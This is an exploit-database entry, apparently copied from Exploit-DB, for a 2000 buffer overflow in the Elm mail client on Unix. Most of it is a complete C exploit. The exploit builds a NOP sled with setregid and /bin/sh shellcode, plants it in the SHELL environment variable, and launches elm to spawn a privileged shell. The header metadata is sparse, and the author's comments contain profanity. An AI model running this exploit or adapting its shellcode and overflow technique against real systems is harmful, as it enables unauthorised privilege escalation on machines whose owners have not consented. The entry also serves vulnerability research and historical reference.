Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (2)

Vulnerability ID: 1053446
Vulnerability type:
Published: 2000-05-27
Updated: 2000-05-27
CVE ID: N/A
CNNVD-ID: N/A
Platform: Unix
CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/19972
|Details
Vulnerability details have not been disclosed.
|Exploit
source: http://www.securityfocus.com/bid/1276/info
 
Buffer overflow vulnerabilities exist in elm (Electronic Mail for Unix). 

/* 
  Elm 2.5 PL3 exploit 
  Tested Under Linux Slackware 3.6, 4.0, 7.0
  By xfer ([email protected])
  Of Buffer0verfl0w Security
  At Sat May 27 18:52:14 CEST 2000
  HowTo: Hmmm.. Ya have to play with offset.
  MoreInfo: Elm is shit, it has bug in each option or function ;>.
*/ 
#include <stdio.h>
#include <stdlib.h>   /* atoi, setenv */
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */
#define PATH "/usr/local/bin/elm"
#define BUFFER 256
#define NOP 0x90
                   /* setregid + generic shell code */
char shellcode[] = "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0"
                   "\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0"
                   "\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07"
                   "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd"
                   "\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f"
                   "\x62\x69\x6e\x2f\x73\x68";
/* Returns the current stack pointer. 32-bit x86 only: the value is left
   in %eax, which the caller reads as the function's return value. */
unsigned long get_esp(void) {
  __asm__("movl %esp, %eax"); 
}
int main(int argc,char *argv[]){
 char buff[BUFFER];
 int x,offset=0;
 long address;
 if(argc>1) offset=atoi(argv[1]);
 address = get_esp() + offset;
 fprintf(stderr,"Address: 0x%lx\nOffset: %d\nShellSize: %d\n",address,offset,(int)strlen(shellcode));
 /* Fill the buffer with the guessed return address (the last iteration
    writes 4 bytes starting at buff[255], i.e. past the end of buff). */
 for(x=3;x<BUFFER;x+=4) *(int *)&buff[x]=address;
 /* NOP sled over the first BUFFER-strlen(shellcode) bytes (this overwrites
    the addresses written above), then the shellcode at the end. */
 for(x=0;x<(BUFFER-strlen(shellcode));x++) buff[x]=NOP;
 memcpy(buff+(BUFFER-strlen(shellcode)),shellcode,strlen(shellcode));
 /* buff is not NUL-terminated: setenv copies up to the first NUL byte it
    finds beyond the array. */
 setenv("SHELL",buff,1);
 if((execl(PATH,"elm",(char *)NULL)) < 0) fprintf(stderr,"Kurwa Mac! No %s file ?\n",PATH);
 return 0;
}
